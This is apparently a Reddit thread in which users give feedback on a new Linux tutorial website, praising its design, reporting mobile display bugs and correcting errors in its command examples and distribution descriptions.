3. `*.txt` is not a regex, so grep won't work with it
4. `/somedir` should be an argument to ls

The correct way of doing this would generally be `ls /somedir/*.txt`, but in the interests of showcasing `grep`, you can do it like this: `ls /somedir | grep '.txt$'`. `.txt$` is a regex, so it has unusual syntax compared to something like a filename glob. The `$` is regex speak for 'end of line', that is, it will match any line of `ls` which ends in `.txt`.

I'll stop on that page for now.

I appreciate you trying to teach the linux command line, but please verify what you put in the tutorial; at the moment, a lot of it is either misleading or wrong, and will only confuse users.
I like it. I wish this had existed back in the 90s when I first started looking at Linux.

The only suggestion I'd make would be to add a few introductory lessons for the pre-grasshopper level, because the terminology in the "Getting Started" section is already immediately going to go over the heads of many people who could be potential Linux users.

A really basic pre-introductory section could avoid the use of specialized terminology as much as possible and spend more time explaining the idea of open source and lead into how that means there are so many distros, just for example.

Maybe a "I have no idea what I'm doing" lesson with "Why Linux (WTF is the operating system anyway)", "About Open Source", "What are Distros", "What's different between Linux and, say, Win/OSX?".

(Edit) I'll just add that the top page is very visual and so beginners might be led to expect there to be more visuals in the tutorials. It might be nice to get someone to put together a "How it Works" type visual thing for the complete beginners.

[This is the wrong way around](http://www.snorflake.com/u/uhN7.png)
[deleted]
[deleted]
Pls no Cloudflare. I'm behind a VPN and I'm very convinced that I'm not a robot by now.

Also, check out /r/linux_mentor 
http://imgur.com/a/W4IIP

Strangely, it renders just fine in RIF.
Embedding .GIF images, showing the commands execution would be nice.
[deleted]
As a user/admin for Fedora/CentOS systems a few things came to my mind:

There are mentions of RHEL and Fedora but no CentOS? It might not need a separate page but maybe a shared RHEL/CentOS page?

Fedora no longer uses `yum` but `dnf`. Though there is still a compatibility wrapper and they're mostly compatible syntax-wise there should atleast be a mention of this in 

Logging section has no mentions of `journald` / `journalctl` which is the main logging system on atleast many (all?) systemd based distros.

The networking commands `ifconfig` / `route` are obsolete. There is nothing inherently wrong with using them if that is what you're used to but new people should just learn the `ip` suite instead. For most things I find the new tools much quicker and nicer too.

For basic NetworkManager setup the tool `nmtui` is quite useful. Maybe that should be mentioned with `nm-tool` / `nmcli`?
**Awesome site, really nice layout.**

However I agree: moving the home button to the left would make it easier to find it. It currently seems to be located in my "blind spot", weird. It's pretty much the last place I look for it, even when I know, where it is.

Hiding the exercise section while the quiz is running would also be a good idea. It looks like it already gives the answer.

Here are some ideas of mine:

A **live terminal simulator** would be awesome but probably quite complex.

Maybe also add a **bad style box** with commands often seen on the web that are dangerous or just ugly, like 

* sudo GUI-file-manager (causing permission problems, especially $HOME/.Xauthority)
* sudo stuffwithconfigsinhome (causing permission problems)
* cat | grep ... (useless use of cat)
* sudo su (instead of sudo -i/sudo -s)
* chmod -R a+rwx  (instead of rwX)
* ...

One of the first question a new user has, **which distro to choose**. So maybe giving a rough comparison of the most popular distros would be a good idea, but will probably stir up a lot of fan-boy reactions, whatever you write. ^^

But all in all it's already a really nice looking site and I will refer to that next time I'm asked where to "learn the Linux". **Great work.**
Looks pretty great to me!
Under your Kernel Installation you have  
   $ ls uname -r  
  3.19.0-43-generic  
  
It should be 'uname -r'
no love for openSUSE?
I just did 3 lessons.  Thanks man
Super nice,   some how looks modern and new yet is easy to move around in. I bookmarked it to keep reading. Thank you!
Awesome job!
[deleted]  
 ^^^^^^^^^^^^^^^^0.1657 
 > [What is this?](https://pastebin.com/64GuVi2F/67064)
Can I make PRs anywhere with spelling and grammar corrections?
>Upstart

>This is the init you'll find on Ubuntu installations. Upstart uses the idea of jobs and events and works by starting jobs that performs certain actions in response to events.

It should read "on OLD ubuntu installations" Modern ubuntus are using systemd
" Linus Torvalds" = incorrect

"Linus Torvalds" = correct

might want to work on that.
"What tool is used to get detailed information about DNS name servers?"  
  
It says correct for dig, and incorrect for nslookup. 

The design and UI looks fantastic. Kudos to your efforts. Please feel free to reach out if you need a helping hand with any stuff/content.
I don't see a license. It seems all-rights-reserved. It looks good otherwise, but I'd only really be inclined to recommend, read, and contribute if it's freely-licensed. I recommend CC-BY-SA as the license, the same as Wikipedia and the most widely respected free/libre/open content license. For the website itself, I'd go with AGPL, but any FLO license is acceptable. Please announce when you add FLO licensing, I'll then promote this widely and encourage contributions… cheers
Flat and simple. I like it.
Firstly, it's GNU/Linux.

In *Init* chapter, section 7 (Power States), I think it's better to use `halt`, `poweroff` and `reboot` (as root or via `sudo`). It's faster to type and easier to remember (and works better on my machine). Also it's worth mentioning that systemd users may use systemctl to avoid signing in as root or using `sudo`:

    # -i flag to ignore other signed in users
    systemctl -i reboot
    systemctl -i poweroff
    systemctl -i suspend

Edit: I forgot to say thank to your great effort. Thanks very much for contributing to the community.
This is great, love the design and information! One thing I noticed was that the pages, I.e. package management, don't display well on a mobile device
I've been waiting for something like this for a while.
I'm definitely using this. Very slick UI, **but** your logo (Linux Journey) looks far too dull.


Also, how do I save my spot? I'd like a system like Codecademy/Khan Academy where it shows you all the parts you completed.


It looks real fun, regardless, and I'm looking forward to reading it after I repair my laptop.
The site seems messed up on an iPhone
Saved, I may end up the admin on my research groups Linux system and I'm sure this will come in handy.
It's not very mobile friendly. Other than that, it looks nice and I like it. Good job!
Great work!! I'm looking forward to spending some time on a Linux journey. Always more to learn! Thank you friend
Site looks great, and really only needs some minor touching up. I started reading through some of it, and much is well-written ... but you may want to reconsider the example of the Downloads folder being included in your system $PATH!!
Nice site, but not scalable ui on mobile device
In [the first chapter of Text-Fu](https://linuxjourney.com/lesson/stdout-standard-out-redirect), when I click  "Check answer" for "What redirector do you use to append output to a file?" question, it redirects me to the page with ["The page you were looking for doesn't exist."](https://linuxjourney.com/answer?utf8=%E2%9C%93&user_answer=%3E%3E&commit=Check+Answer) message.
I could be wrong, but i think these are mixed up.

Create a compressed tar file:

$ tar xzf myfile.tar.gz

Uncompress and unpack:

$ tar czf file.tar
Works great on tablet and desktop. The mobile site is buggy though.

http://imgur.com/gallery/zncCm

Great work though. Would be recommending this to anyone who asks about Linux 
I noticed in the network config section you mention twice "We discussed (thing) before". I suppose you do this in other sections too. It would be nice if at least you mention where it was discussed. This way someone who doesn't follow linearly can jump in the relevant section and see more of that discussion. Like the reference books do.
I just cross-posted this to [linux4noobs](https://www.reddit.com/r/linux4noobs/comments/4m61ss/i_made_a_site_to_learn_linux_what_do_you_think/). Really good-looking and informative site, great job :)
Quickly perused a couple of the lessons, and found a few problems:

* https://linuxjourney.com/lesson/help-command
 This one is wrong. Try running `help ls`. ls, cat and mv are not builtins in bash at least. 
* https://linuxjourney.com/lesson/cut-command 

  > `$ echo The quick brown; fox jumps over the lazy	dog > sample.txt`

  This will run an `echo` followed by a `fox` command. Obviously not intended. I'd also recommend teaching `printf` rather than `echo`.

* https://linuxjourney.com/lesson/grep-command

  Please find a better example to use than `ls | grep *.txt /somedir`; don't teach people that treating filenames as lines are ok. The example is also wrong in other ways; you're not passing grep a regex there, you use a glob that the shell will attempt to replace with matching filenames, and grep will ignore stdin since you provided at least one file.


Did you make all the graphics yourself and fill in the content? 

If so it's something to showcase; in any case it's cool.

The quiz could benefit from being optional (maybe even it's own UI); and loading in via AJAX (potentially saving you bandwidth and any calls to DB). Maybe even saving answers to localstorage (future goals, learning transcript).

On mobile, the side menu should be inline; prior to the content. Sure it requires scrolling (you could always assign an id to the content and navigate to that so the user scrolls up to get to nav on small-screen devices). I'm not sure making the sidebar wider and thinner adds much to the user-experience.

Lastly; It doesn't state which technologies it was built with. I can see a few of them by peeking into front-end source; but headers don't reveal much other than cloudflare; perhaps it would be nice to give them some kudos to the tech that enabled the site to be built.
One of the rare pages where design and usefulness of the website go together, this looks amazing!
>Edit: Woah! I wasn't expecting so much awesome feedback, this is fantastic! Thank you all!

Looks like it's going to get even bigger since OMG Ubuntu just published an article about it.

http://www.omgubuntu.co.uk/2016/06/learn-linux-great-new-website-linux-journey
Looks absolutely beautiful, the lessons are very interesting are pretty interesting. Nice work!
I've been interested in getting into Linux and looking for something like this for a while. I'm very excited to get started! Thank goodness i was on /r/all today! 
A fantastic web-site! Really worth an extensive read. I appreciate the quiz form you used.  
Some things I'd love to see in addition:  

* S.th. on virtualisation would be nice.  
* Maybe it's in s.th. I didn't look at, but do you have a piece about "log on a server via `ssh` and start a `screen` session" or the like?  
* In the package section, you could add a page about proprietary packages, esp. graphics drivers (I think that's a major thing for many newbies)  
* Maybe that's too technical, but some words about Qt vs. GTK+ could be nice for those interested...

But anyway, I will recommend this to *many* people! And I am sure I will work through it myself... Thank you very much.
One last thing: I'd like to encourage you to add some info about openSUSE. I kind of missed it...
Your site should NOT begin with "a long and hard journey".  It is neither long nor hard.  You can sit in front of Linux without any knowledge and use it.  It's only when you want to delve into things more traditionally targetted at developers or technicians that the journey becomes longer and you need to know more.
/u/warbydarby As you are someone who creates websites, I have a website creation question.

Why do you and so many other web designers use top level page names like "Home | Linux Journey" when you know that this field is used as the default bookmark name in the browser? Much better would be just "Linux Journey" or, if really necessary, "Linux Journey | Home".

Of course, even worse is the paragraph-long page name.

BTW, great site and useful content.
Holy hell man, nice freaking work. I mean, I wasn't expecting something this nice. As other comments have pointed out, the design is sleek, efficient and very pleasing. What you're writing seems solid to me, you don't pull any crap in the background and the explanations I read so far seem solid.

Bookmarked, forwarding it to a friend already and you should be proud of what you created. Wonderful.
Lol. I used that bootstrap template and icons on my assignment. Looks nice, though.
Don't know if you know this, but you've been noticed!

[Article on OMG! Ubuntu](http://www.omgubuntu.co.uk/2016/06/learn-linux-great-new-website-linux-journey?utm_content=buffer14abd&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer)

[The Twitter post](https://twitter.com/omgubuntu/status/738347464680439808)
This looks great! I'm beginning at the moment and the information looks perfect for what I need!
Excellent work! I've spend the past hour going through tutorials. Embedded videos would be a nice addition, and/or an .mp3 voice recording of the written content.
Cool. Good job.
I'd comment on your website but I don't know how to open the web browser on my new linux machine.

wait a minute....
Very nice! Some illustrations might help in some sections (especially networking).
An interactive console for practicing would be great.
Solid work!! Very nice!
Really like the site. I just have two minor gripes.

1. Mobile view is not displaying correctly
    * The menu bar is partially hidden.
    * Code boxes don't scroll. (EDIT 2: They are only scrolling horizontally when I've scrolled all the way up)
    * Some of the text in the exercise sections is sometimes cut off.
    * The green background on the home page is too high, meaning the last line is white text on white background, and hence unreadable.
    * Likewise at the bottom of the page the last few lines are also white on white.
    * The text box in the exercise section doesn't resize
    * The exercise and quiz boxes have some odd bottom snapping going on.
2. Misspellings/Typos (Will update as I read whole site)
    * [You can specify what ~~time~~ *type* of file you are trying to find.](https://linuxjourney.com/lesson/find-command)
    * [Try it out on a few command*s* to get more information about them.](https://linuxjourney.com/lesson/man-command)
    * [If you ran whatis cat, ~~you’ll~~ *you'd* see there is a small blurb](https://linuxjourney.com/lesson/whatis-command)

___
I am a linux noob, so your site has been rather helpful but with the [alias command](https://linuxjourney.com/lesson/whatis-command) doesn't the alias you make only last for that session. Ie, if you close the terminal then the alias stops existing?
Nice one, I'll book mark it and share it with anyone I know that wants to get into linux. Nice Contribution pal.
The icons for each section look fantastic!

Actually, the whole site looks great, I'm generally surprised. 

Otherwise, the site itself and the information provided is a great for people new to Linux! I'm generally surprised, but this is one of the best tools Ive found. The exercizes window is a great feature too. Good job on this one, I might send this site to my Windows-using friend.
>https://linuxjourney.com/lesson/%E2%80%99http://www.redhat.com/en/technologies/linux-platforms/enterprise-linux%E2%80%99


The page you were looking for doesn't exist.

You may have mistyped the address or the page may have moved.

If you are the application owner check the logs for more information.

In getting started I'd put uses as the first header, as well as include if user friendly

Also 

>because it’s gonna be a long and hard road

Lets stay positive

Remember people coming to Linux are going to hear/read things they have never heard before. And your typical computer user will have no idea what a repository, package, package manager, distribution, and other jargon.

I do like what you have done though.
I like you. Your site is dope. 
The design is very pleasing (y).
Absolutely amazing! Thank you so much for your contribution towards providing a way to learn Linux.
That's impressive!
this would actually be great for light trouble shooting, not to directly trouble shoot but learn wtf im actually doing. 
Great stuff, I really like the layout
Looks great! Just reading through the introductory pages because honestly, even as a full-time linux user, I use linux simply because it works.
great idea, site, layout and design! 

progress saving so I can go back and remember where I'm at and recording progress would make it even more awesome.
As a Network Engineer, I'm a little disappointed there is no mention of mtr. Honorable mention nmap.
That's an awesome website!! Great job.  
[Bookmarked] :)
Like it. Gave up Windows 1 1/2 year ago and Self-taught myself first on Mint and for the last 4 mo Ubuntu Mate. Need more experience with the terminal (too much sudo cut and pasting from websites, and not knowing how to navigate, to having a NAS and it should be more seamless than it is. So I'll be going through the whole thing. Thanks
It would be pretty awesome if you would cover more Arch Linux. The package manager is superior to Ubuntus one and in general the Arch Wiki is one of the best online resources to learn about how an operating system/computer works.

Do you plan to put this code on github so people can make PRs with additional chapters?
After browsing a couple of pages, here are a few suggestions, I find useful in day to day work, that you might consider adding:

- For your `less` command page, read [this link](http://unix.stackexchange.com/questions/81129/what-are-the-differences-between-most-more-and-less) about how `less` is evolved version of `more`  
- Shortcut for `clear` - `ctrl+k` / `ctrl+l` (Well, test it in a ubuntu box, I confirmed this on a OSX terminal)  
- Special mention about `rm -rf ` maybe
- If you are adding `find`, you gotta pair it up with piping and `xargs`. Real useful for batch processing.

It's a great effort. As other people already mentioned, UI for navigation could be better, but that is easily fixable. I will certainly refer people to this site. Keep up the good work.
Re. interactive consoles. Maybe this helps: http://rik.smith-unna.com/command_line_bootcamp/
A very well made website to learn the uses of Linux. I'm planning on making own PC and want to use Linux. So this website should be helpful.
So far so good. I am going for my ccna so the networking part will be a bonus.
Excellent site. Well done and thanks!
Looks awesome. I'll go over each section tomorrow at work. It reminds me of codecademy a bit. 
the questions are way to easy. Please use real examples and not 

Chapter mkdir

Q: What command do you use to make a directory?  
A: mkdir

edit: it keeps going and going

Chapter alias:  

Q: What command do you use to make an alias?  
A: alias
This is really cool - practical and pragmatic examples of commands are what I find most helpful, though surprisingly, not at all in MAN pages. 
Great site.

Do you have somewhere to submit bugs to?

For example, on https://linuxjourney.com/lesson/filesystem-types

  df -T  won't work on some systems, as it requires the type parameter be known.
Really cool stuff! :D
Awesome!
Nice clean looking website. Well done
I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit:

- [/r/linux4noobs] [I made a site to learn Linux, what do you think? \[x-post \/r\/linux\]](https://np.reddit.com/r/linux4noobs/comments/4m61ss/i_made_a_site_to_learn_linux_what_do_you_think/)

- [/r/opensuse] [Someone made a new introduction site for Linux Learners & asks for feedback...](https://np.reddit.com/r/openSUSE/comments/4m7vpz/someone_made_a_new_introduction_site_for_linux/)

[](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*

[](#bot)
Sweet! Thank for sharing, you did a good work.
Christ, the only thing I get around to finishing is myself, so for you to get around to building a hobby website to help others is incredible. Thank you.
Would be nice to have a back button near the continue button.
Hi, great website and I'm actually learning something. Small change request though, can you make commands in your paragraphs italic? Ex:

> Right now it’s like we are moving around in the dark. Well, we can use the wonderful *ls* command to list directory contents.

Or you could change the font or something to emphasize it's a command. Thanks you!
I think  a brief explanation of UEFI should be included in **Boot Process**.
You did a great job with this web!! I send it directly to my favourites and some mates that are starting to use linux.
I ran through the choose your distro section and noticed you Include RHEL but not openSUSE , I am not suggesting replace rhel for opensuse , but just consider adding it as It is one of the most popular distros around for desktop Linux usage ,compared to RHEL that Is more server oriented.
The learning curve for Linux is always a little steep even for the "user friendly" distros. This is a great tool for people starting out. Fantastic Job!
Awesome website! Great job!
Thanks for making it. 
gurl, i've been watching your videos for a while and it just dawned on me you don't have a scream queens lookbook yet.  
  
which, i wouldn't force you to make, but the scream queens fashion and aesthetic is your level of extra??? you were kinda the first person i expected would do that hahaha :D love boo!﻿
JUST SLAYED DISCOUNT BAGS. IM SHOOK. ONLY YOU  
  
when i listened it for my first time i was like ''eh its not that bad'' and now when i had listened it like 100000000000000000000000000000000000000000 times im like ''IM LOVIN', IM LIVIN', IM PICKING IT UP (;''﻿
Amazing would be for the community to be able to add to the content. 
If there is Gentoo and Arch Linux, then why not Slackware?
That's great work. Bookmarked as a resource I can point beginners at. I may even peek at it myself every now and then.

Excellent site.  The information is presented well and dives a little further, like you wanted to achieve.

Perhaps add difficulty levels to your quiz questions?  Most of them you can just lift the answer straight from the lecture with ctrl+f, but some of them required a little puzzle-piecing to figure out.  These latter ones I mention I found to be the most beneficial.
i love love love this and totally see myself coming back. Please can you think about a progress trackingsystem, so I come and go and see what I have accomplished and what I still need to do. 

samething like http://www.daveconservatoire.org/ or codecademy  
I have liked the learning levels i.e beginners to expert.
Super clean! I noticed a bug, I wrote "Linus Torvalds " and got wrong answer because of the space behind "Torvalds ". 
This looks incredible. Gotta check this out on my desktop because it was pretty broken on mobile http://i.imgur.com/8AqLwYb.png

Also for this bit in the processes bit 

>We're gonna segway so you can see this action, go ahead and type Ctrl-Alt-F1 to get into TTY1 (the first virtual console), you'll notice how you don't have anything except the terminal, no graphics, etc. This is considered a regular terminal device, you can exit this with Ctrl-Alt-F7. 

You might want to make sure the reader knows about ctrl alt f7 before they switch to tty
The IPv6 chapter is rather brief. I also strongly disagree that if you know IPv4 that you will also know IPv6. My ISP just started handing out IPv6 ranges so it'll be something I'll be digging into this week.

Anyways, I think that chapter needs to be expanded a lot, I'm just not the right guy to help you out with that. For example, the "classic" network setup where you have 1 public IP and a network behind NAT doesn't apply anymore to IPv6 networks. Your adapter will also have more than 1 IP because you'll have a link-local address (fe80::/10) which is required and then there's multicast, anycast and unicast addresses. I'm still reading up on these.
Looks really marvelous, I'm using it myself.
https://linuxjourney.com/lesson/choosing-a-linux-distribution has no mention of openSUSE Leap or openSUSE Tumbleweed... very dissapointing :(
Thanks alot, its nice to have this in place. Will be around it alot.
I'm glad to see someone advocating the use of `ls | grep -i search` to find a file within a directory. It's so much quicker that using find, yet so often I get people saying 'ewww why are you doing that'
Holy fancy bio-carrots, batman!

That's one good looking website.

Keep up the good work. :D
A previous chapter/next chapter button would be nice

I've only skimmed it but I would suggest mentioning auto-complete (ie hitting tab to fill in commands, directory’s and file-names) at the end of the command line section. Typing in long paths etc takes all the fun out the command line.
Nice, very simple clean and fun. Good work!
You have done a great job keeping things brief and easy to read, it is well organized, and has exceptionally good visual design.

My one criticism is that I feel that your description of Bash was understated. I think you need to emphasize more just how important Bash is, and how anyone who wants an advanced understanding of Linux should learn all the ins and outs of Bash programming, and this should be mentioned in the "Grasshopper / Command Line / Shell" section.

You should have an entire section in the "Journeyman" level on Bash programming. This section should go over the read-eval-print loop, especially regarding how Bash tokenizes user input and uses the first token as the command and the remaining tokens as parameters. You should discuss conditionals, loops, functions, parameter passing, string manipulation, built-in arithmetic functions, how to use arrays with loops, how to fork process and how process input-output streams can be linked into pipes, and discuss of course job control.

nice!
First, that looks great. Also I'm quite happy to learn that after 1 year I'm not that newbie anymore :D 
Eh
Spotted a typo in the subnetting part, the 124 should be 128 ;) Lots of detail to get in there, 

    Convert Binary 11000000 to Decimal

    For binary to decimal conversion you add up the numbers that have a 1, so:
    
    124 + 64 + 0 + 0 + 0 + 0 + 0 + 0 = 192!
I love this, but I found the "Advanced Text" part very basic, it needs to be in more detail.
Looks amazing, will check it out when I have more time.
Thanks Mate!
Already in my bookmarks!
Thank you very much. 

This is great!
Just shared this link with a few people learning Linux.
You forgot openSUSE.... everyone forgets openSUSE :-( even though it's one of the oldest and one of the better distros out there.

Edit: Ooops, I see someone else already suggested it.  That'll teach me... "search first you numpty" :-P
Holy shit! This is awesome! Thank you so much! I hope this stays free. I'll be happy to support your site in whatever way I can.
This is really impressive.
I like your fine initiative! Sharing knowledge is always a good thing, in my book. I'd like a "Wizard" section, or something similar for programmers and power users. I could even contribute, if you wish.
great website! thank you very much!
Seems pretty cool, thanks fro the effort!
Brilliant site and so informative! I've bookmarked it!

Thanks so much for taking the time to create such a wonderful website!
as someone who had few skills and used the *immersion technique* to get started in linux.............where were you 4 years ago!??!!



and thank you.
It doesn't display properly on my phone.  Objects in the page are the wrong size, over lap, out there's crazy wife gaps.
Great! I like the layout and the information.
Thanks!
It's down right now, heads up!
I wrote a pseudo she'll application in Java for a final project senior year. If you want it or just to see it I can provide it to you. 
Sure, I've read many of the negative comments and while mobile-ready and all would be nice, this is exactly what I will send to people who are complete newbies and want to learn linux. Thanks!
I love it. I'm sharing the link with all my colleagues.
Would be helpful to be able to navigate to other lessons while inside of another by making them collapsible. Take a look at how Udacity does their new classroom page.
I use linux for work etc but I have a university networking exam coming up and I just couldn't get my head around subnetting. Praise you, bro! <3 
It looks amazing. Any chances that you'll host it on Github/Butbucket for the rest of us to contribute and flag bugs?
Very cool. I just started learning linux so this will be a great resource. Thanks!
Thanks for creating this, very helpful.
I really love the idea and the implementation! I have to go through it more deeply when I have the time, but it seems really great! Thanks.

Would you be interested in some help to translate the page to Spanish? (Without strict timeline, I should not forget about my PhD thesis... :P)
hey in the quiz section, if i type a blank space after my answer, it doesnt work. for eg, if the ans is 'man', if i type 'man ' it fails. that canbe potentially unleading and frustrating 
Disclaimer: I'm an Ubuntu user and Ubuntu advocate. However, I am fine with you advocating and using Linux Mint, but there are some factual inaccuracies in your distributions section.

---

I imagine that the section on distributions will get a lot of controversy. One the one hand, it's probably not a good idea to introduce too many distributions from the start, I think that a lot of newbies find this daunting. But people who use certain distributions think they are very justified in using those distributions and want other people to use them. It's up to you, but I would try to limit it to a few, about as many as you have now. You could have a later section which details more distributions for those who are interested.

Having said that, CentOS deserves a mention in RHEL because it is pretty much an open-source version of RHEL (I'm paraphrasing, someone who uses RHEL/CentOS will be able to phrase that better) and I don't think one sentence on CentOS will complexify that section much.

A better way to describe Debian Testing is to say that that is the development release for the next version of Debian. It's like using Windows 10 before it has been released. Debian Unstable is more of a rolling release, which means that you never need to upgrade your operating system, but, as the name suggests, expect bugs and crashes.

A better way to describe Fedora is RHEL/CentOS for desktops. CentOS is the distro better described as RHEL without the price tag.

I disagree with what you've written in most of the Linux Mint page. You're entitled to your opinion, if you think Linux Mint is the most easy-to-use operating system and you want to say that, that's fine, but there are some factual inaccuracies.

'It uses Ubuntu’s software repositories so the same packages are available on both distributions.' - Not technically true, more true to say that it's based on Ubuntu and is able to use Ubuntu software repositories (PPAs, but you don't need to say that). I think the mention of LMDE (Debian-based Mint) would complexify this section too much, LMDE is not yet the default, best just to talk about Linux Mint.

'Linux Mint is preferred by others over Ubuntu because it doesn’t come with the some of the proprietary software that Ubuntu includes such as Unity.' - Not true, it's actually preferred because it includes and uses proprietary software by default (and, you'll probably want to say, that makes it easier to use). But they've just said that they'll stop releasing proprietary media codecs in the install, due to licensing issues, but they still tend to recommend proprietary software more than Ubuntu does. Also, Unity is not proprietary software, it is open-source (Landscape is Canonical proprietary software).

'Great user interface, great for beginners and less bloated than Ubuntu.' I'm fine with the first two statements, what do you mean by the third? I can see you're trying to use the rule of 3 here, but you still want to be accurate, right?

'Similar to Debian, Arch uses a rolling release model so incremental updates eventually become the Stable release.' Not correct, probably should read 'similar to Debian Unstable, Arch uses a rolling release model so you never need to upgrade your distribution, but this may come at a cost for stability [though that is debateable, hence I said *may* come at a cost for stability].
Thank you for developing this. Great site, great content! Sharing right now!
I took a quick glance...that is really cool! I'm trying to get back into using linux on a regular basis after not doing so for a few years, and even when I was I know there was a lot that I didn't learn well, so this looks like a great resource. Thanks for making it!
This is gorgeous. Thanks for putting in such a huge effort to make this available. I'll be using it./ 
Are you using Hugo by any chance as website engine? 

It is awesome! Well done. :)
There appears to be bug on page about vim navigation. It says:

j or the up arrow - will move you up one line

k or the down arrow - will move you down one line


but it is actually reversed

k - will move up one line

j - will move down one line
Good work on surviving the reddit hug of death. Great site
This is great, Thank you
I recommend direct links to each Distro's site on that first intro page's sections. Even a small link at the bottom of each distro would be a good thing.
I love it, I learned a lot of material from your site keep up the great work

I really like the layout of this site.  I'll give this a proper run through later, but def like what I see so far.
Holy crap. That's beautiful site.
Really nice!   just a thought.. but perhaps add a "Flame Wars" section to explain some of the basics of of the "strong opinions" on things like "init vs systemd" and others.. kind of like an ELI5..
Looks good so far, but at least mention that net-tools (ifconfig and route) are **deprecated** and aren't part of the default installation of many distros anymore.

On the rpm section:
> Just like .exe is a single executable file, so is .deb and .rpm.

This is wrong, rpm's are more like tars (actually cpio archives)
good job man! thanks
I just send this to my brother-in-law who is a developer. He started out in the Windows world, but now develops Python using Flask. He's still very green in Linux and has been wanting to learn more. I sent this to him and asked for his feedback. 
> you'll hear a never ending banter about the godliness of either vim or emacs. Don't even try to bring up using a GUI editor if you value your life.

The true essence of Linux.
when u go to a specific page The Side bar doesnt work correctly on the smartphone
Awesome, a Linux how-to site that doesn't look like a hideous relic from 1997!
To childish looking.  Graphics more suitable to a play room than educational.

Absolutely nothing about errors or what to do when things don't go as expected.   Every tutorial is much to basic and boarders on useless.

At the end you will have typed in some things, but not really learned anything.


wow, well done!
Thanks! I just shared this with some colleagues who started recently who are new to Linux. I'll let you know if I have any suggestions as I look at it more.
The "additional reading" bullet points are spaced poorly.

>© 2016 Linux Journey

Some open license (CC BY-NC-SA) and an open bug tracker/CVS would fit better, wouldn't it?
Ooohh. at first I was like aftera title read. Man it's pretty hard to "Learn Linux" Im still learning. Though this seems pretty good. I really like the way some things have been broken down to be palatable...although I kinda do see the shortcuts (Like NFS section). Still though I like how it goes further!
I love the look and am planning on going through this material as I now work in a Datacenter that is linux based most of the time..

My question is...do you consider this a good study tool to help pass Linux+ exams? How confident would you be using this as a primary source of study material to pass the exams?
Needs some inline graphics and diagrams to help drive some points otherwise awesome site!
As someone who just started playing around with Linux, I've bookmarked your site. Lots of useful things and I've already found answers to some questions that I had, and some I didn't even know I had! Thanks!
Suggestion: add opensuse to the list of distros, it's a really solid OS backed by SUSE. 

also can people contribute to this project?
Would you like any help with developing the website? I have experience with mostly back-end stuff, but I can do some front-end stuff too.
It's a very well done and attractive website. Kudos to you for that. 

However, content wise it's not that different from a lot of other free resources....hate to say it but other than the look and feel nothing really stands out.  One thing I thought these tutorial sites could really use is a simulated shell where you can try the commands out for yourself and have the content guide you inline. 
Looks like on mobile, the main text is missing some bottom padding
I have some suggestions for the distro section.
I would skip Debian, Gentoo, Arch, and RHEL as good starter distros. I would add CentOS since it is basically a free version of RHEL. I would also suggest including some super light distros like Lubuntu, DSL, and or Puppy Linux. Also some special Linux Distros like one for a Kodi, a NAS,  Router, and of course one for the Raspberry Pi. 
Also a section of Desktops might be good since most new users have probably never used a CLI.
Gorgeous site and wonderful content. Some quick feedback:

 - At the bottom of [each page](http://linuxjourney.com/lesson/linux-history), I think it would be better to have the challenges inline rather than in the right column. The three-column layout you use makes the left and right columns ignorable, by default. It took me a minute to realize that the bottom right column contained a "Continue" link, since it didn't seem to be in-context of what I was reading. My original comment here was going to be that you should have a "Continue" link at the end of the content, until I went back and noticed that one existed.

 - "Linux-fu" (or *anything*-fu) feels dated to me

 - When viewing from a desktop, the hamburger icon (.glyphicon-align-justify) in the main menu isn't meeting expectations IMO. Collapsing/expanding a menu left/right should use chevrons or arrows (<, >). Hamburgers should be used to show a menu that isn't currently displayed.

 - Your "Quiz" section on the right doesn't display well when you're using a viewport that's [wide but vertically narrow](https://dl.dropboxusercontent.com/u/10428774/reddit/Screen%20Shot%202016-06-02%20at%208.11.18%20AM.png). The browser (in general) doesn't play super nice with vertically constrained content.

Otherwise this is great, and I'll definitely be pointing some folks internally to this :D  I love when people try to boil this stuff down. Reminds me of http://vim-adventures.com/
Where did you get the icons from? I forget this style of art but I believe it's called "flat" and it's perfectly simplistic, by that I mean it communicates well.
It appears to function in lynx as well :O
Nice work.

Some constructive remarks:

* Provide a way to easily navigate back to the main page. Now you have to go to the last page and click the "Return to main menu" button.
* in the installation section, I would mention that they could easily install Linux inside a VM on Windows or Mac inside something like VirtualBox without fearing of destroying anything or losing data.
* I would put more stress on the "man" in the command line section, and add that the "--help" usually also provides a brief help message. In general, this should be stressed/added in more places: how the user can find out more about the topic by himself.
* Go a bit deeper into the concept of the user home directory
* A bit more about environment variables, their use and effect on things, setting them, changing/updating them
* mention `Ctrl-D` to log out of a shell in the "exit" section
* In the editor/vim section, immediately tell them they can't type stuff in the editor, and there are 2 different modes: command and edit mode. The most important things about vim are: how to start, understanding the command/edit mode and switch between them, how to save, and how to quit without saving.
* In the network config section, at least mention the `ip` command.

I looked at it briefly and found the design really modern and nice looking. Content was also good. I will definitely show this people that are starting with linux and the people i allready converted to linux
The site is great!

IMHO it would be a good idea to also mention the `-iname` flag for `find` to make the search case-insensitive. (But that's for you to decide of course - I totally understand that you don't want to describe too many flags, your site isn't a man page after all :-) )
This is great, and amazingly practical!

I can survive in the linux command line, and know vim basics, so I learned a few new commands, but my personal feedback is that the quiz questions are a little easy, and I would have liked to see additional questions (e.g. 2-3 "basic understanding" questions, and 1-2 "using the understanding with other linux commands" questions).
This a beautifully made site. I'll be sharing it with friends and coworkers. I'll have to peruse the information aspects when I have time. Great job!
~~From a quick poke at the "Filesystems" section: Maybe tweak the text to talk about some of the "important" sub-dirs (/var/log or /var/log/ - Depending on how you type it) and tweak the questions a little to fit that.~~

~~Just my 2 cents!~~ Just went to "Logging" - Oops!
Great intro to computers with focus on linux. Keep up the good work.
Input box for answer in Quiz window does not have background color set, so I see complete blackness when entering text.

https://wiki.archlinux.org/index.php/Firefox#Unreadable_input_fields_with_dark_GTK.2B_themes
I've been a linux user for 8 years and I learned a lot! Thanks man!
Nice. Good job.
I spotted a grammatical mistake. You have

> There are many Linux distributions to choose from, we’ll just go over the most popular options. 

The comma is ungrammatical. (One cannot use commas to conjoin clauses that could stand on their own as sentences.) Hence - to those who are aware of these things - it reads poorly. Moreover, I imagine that the same mistake might be made elsewhere on your site. You should replace the comma with a semi-colon or start a new sentence.
Very nice looking website. I'll definitely be checking it out.
I think this amazing.
